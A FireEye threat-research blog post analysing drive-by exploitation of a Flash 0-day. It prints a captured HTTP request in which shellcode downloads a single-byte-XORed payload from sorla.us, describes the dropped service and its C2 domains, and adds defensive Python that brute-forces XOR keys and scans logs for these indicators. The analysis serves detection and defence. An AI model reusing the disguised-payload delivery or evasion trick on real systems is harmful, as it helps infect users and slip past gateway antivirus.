
FireEye Malware Intelligence Lab

Threat research, analysis, and mitigation


Who is Exploiting the Adobe Flash 0-day? - Part 2

The new Flash 0-day has opened multiple avenues for malware authors. In my last article I showed how this vulnerability is being exploited via the PDF reader's support for SWF files. However, it can just as easily be exploited in a standard drive-by fashion, purely in Flash, and that is precisely what has started to happen.

Here is the snippet of the JavaScript that is actively targeting this 0-day vulnerability.

[Image: exploit JavaScript snippet]

This exploit worked successfully on my VM under Firefox 3.5.1 and Flash Player 10. It ran smoothly, and just before Firefox crashed I saw an outbound communication like this:

GET /images/x/xor.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sorla.us
Connection: Keep-Alive


[Image: xor.gif as served]

xor.gif is in fact a single-byte XORed version of the original malware binary. The shellcode downloads this file and XORs the whole of it with 0x95 to recover the final payload. That such a trivial XOR obfuscation works shows just how easy it is to evade a gateway AV product that is looking for executables on the wire.
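A gateway check that does not rely on the file looking like an executable on the wire can undo the obfuscation itself: single-byte XOR has only 256 possible keys, so a scanner can try all of them and test each result for a PE header. The following is an added example written for this post, not code from FireEye or from the malware; the sample "PE" it builds is a constructed stand-in (an MZ stub whose e_lfanew points at a PE signature), the request path is the one from the capture above, and the key 0x95 is the one the post reports.

```python
import struct

# Key the post reports the shellcode uses to recover the payload from xor.gif
REPORTED_KEY = 0x95


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR. The same call obfuscates and de-obfuscates."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE check: 'MZ' at offset 0 and 'PE\\0\\0' at the offset stored in e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(blob: bytes):
    """Brute-force the 256 single-byte keys; return the one that yields a PE, else None.
    Key 0 covers the case where the blob is already an unobfuscated executable."""
    for key in range(256):
        if looks_like_pe(xor_bytes(blob, key)):
            return key
    return None


def classify_download(path: str, blob: bytes) -> dict:
    """Verdict for one HTTP response body, e.g. the /images/x/xor.gif fetch seen above."""
    key = recover_xor_key(blob)
    if key is None:
        verdict = "no PE found under any single-byte XOR key"
    elif key == 0:
        verdict = "plain PE executable"
    else:
        verdict = "PE hidden by single-byte XOR (key 0x%02x)" % key
    return {"path": path, "key": key, "verdict": verdict}


def build_sample_pe() -> bytes:
    """Constructed stand-in for a PE file (not a real binary): a DOS header with
    e_lfanew = 0x40, followed by the PE signature and zero padding."""
    dos_header = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)   # 0x40 bytes
    nt_headers = b"PE\x00\x00" + b"\x00" * 60
    return dos_header + nt_headers


if __name__ == "__main__":
    sample = build_sample_pe()
    served = xor_bytes(sample, REPORTED_KEY)        # what a gateway sees on the wire
    print(classify_download("/images/x/xor.gif", served))
    print(classify_download("/images/real.gif", b"GIF89a" + bytes(range(64))))
```

The PE test deliberately checks both the MZ stub and the PE signature at e_lfanew: matching only "MZ" would produce a false positive for roughly one in 65,536 random two-byte prefixes per key tried, which over 256 keys is far too noisy for a gateway. A real GIF never decodes to a PE under any single-byte key, so a mismatch between the served name and the recovered content type is itself the alert.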

Just how quickly AVs are responding to this threat can be seen from these results...

Here is the detection rate for B.exe (da0a41f75331d804a85801ac9ac09a26) so far...

[Image: VT report last night]

[Image: VT report this morning]

The detection rate increased from 27.50% to 52.50% overnight.

So what is B.exe all about? B.exe drops a DLL, wmimachine2.dll, into the %system directory and installs it as a service named ".NET Runtime Optimization Service v2.086521.BackUp_X86".

It then tries to contact tro2.6600.org and getport.2288.org on TCP ports 8080 and 19939. These two domains used to resolve to 218.93.127.157, but that is no longer the case.
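The host and network behaviour just described is exactly the kind of thing a responder can sweep logs for. Below is an added example, not FireEye's tooling, that matches the indicators the post gives (the two domains, the former IP, the two ports, the service name and the dropped DLL) against a few constructed key=value telemetry lines. The log format and host names are assumptions made for the example; port-only hits are marked weak, since 8080 in particular is too common to mean much on its own.

```python
import re

# Indicators taken from the post (B.exe behaviour and infrastructure)
IOC_DOMAINS = {"tro2.6600.org", "getport.2288.org"}
IOC_IPS = {"218.93.127.157"}
IOC_PORTS = {8080, 19939}
IOC_SERVICE_NAME = ".NET Runtime Optimization Service v2.086521.BackUp_X86"
IOC_FILES = {"wmimachine2.dll"}

# Constructed sample telemetry in a key=value style (not real logs)
SAMPLE_LOGS = [
    'ts=2009-07-23T01:02:03 type=dns host=WS17 qname=tro2.6600.org',
    'ts=2009-07-23T01:02:04 type=conn host=WS17 dst=218.93.127.157 dport=8080',
    'ts=2009-07-23T01:02:05 type=service host=WS17 '
    'name=".NET Runtime Optimization Service v2.086521.BackUp_X86" '
    'path=C:\\WINDOWS\\system32\\wmimachine2.dll',
    'ts=2009-07-23T01:05:00 type=dns host=WS02 qname=www.example.com',
    'ts=2009-07-23T01:06:00 type=conn host=WS02 dst=203.0.113.9 dport=443',
    'ts=2009-07-23T01:07:00 type=conn host=WS02 dst=203.0.113.9 dport=8080',
]

# key=value pairs; the value may be double-quoted (service names contain spaces)
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> dict:
    """Turn one key=value line into a dict; quoted and bare values both accepted."""
    return {key: (quoted or bare) for key, quoted, bare in FIELD_RE.findall(line)}


def match_indicators(event: dict) -> list:
    """Return the indicator tags one event hits. A port hit is 'strong' only when
    the destination is also a known IP; otherwise it is tagged 'weak'."""
    hits = []
    qname = event.get("qname", "").lower()
    if qname in IOC_DOMAINS:
        hits.append("domain:" + qname)
    if event.get("dst") in IOC_IPS:
        hits.append("ip:" + event["dst"])
    try:
        port = int(event.get("dport", ""))
    except ValueError:
        port = None
    if port in IOC_PORTS:
        strength = "strong" if event.get("dst") in IOC_IPS else "weak"
        hits.append("port:%d:%s" % (port, strength))
    if event.get("name") == IOC_SERVICE_NAME:
        hits.append("service:" + IOC_SERVICE_NAME)
    basename = event.get("path", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if basename in IOC_FILES:
        hits.append("file:" + basename)
    return hits


def scan_logs(lines) -> dict:
    """Aggregate indicator tags per host across all lines."""
    per_host = {}
    for line in lines:
        event = parse_line(line)
        for tag in match_indicators(event):
            per_host.setdefault(event.get("host", "?"), set()).add(tag)
    return per_host


def triage(per_host: dict) -> dict:
    """Label each host: anything beyond a weak port hit is treated as a likely infection."""
    verdicts = {}
    for host, tags in per_host.items():
        strong = [t for t in tags if not t.endswith(":weak")]
        verdicts[host] = "likely B.exe infection" if strong else "weak signal only, review"
    return verdicts


if __name__ == "__main__":
    hits = scan_logs(SAMPLE_LOGS)
    for host, verdict in triage(hits).items():
        print(host, verdict, sorted(hits[host]))
```

Because the post notes that the domains no longer resolve to 218.93.127.157, the DNS query for either domain is the more durable network indicator; the service name and the DLL name are the host-side checks that survive any infrastructure change.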

Here are the WHOIS records:

[Image: WHOIS records]

In the coming days, once this exploit makes its way onto a public website (at the time of this writing there is no public PoC exploit), we will certainly see a far higher malware count. The fact that a very similar piece of malware is attached to this exploit variation suggests that the PoC details are not leaking into the malware circles. Web surfers need to be very careful, as these recent 0-days have given attackers the opportunity to exploit any system running the ubiquitous Flash player.

Atif Mushtaq @ FireEye Malware Intelligence Lab

Questions/Comments: research SHIFT-2 fireeye DOT COM
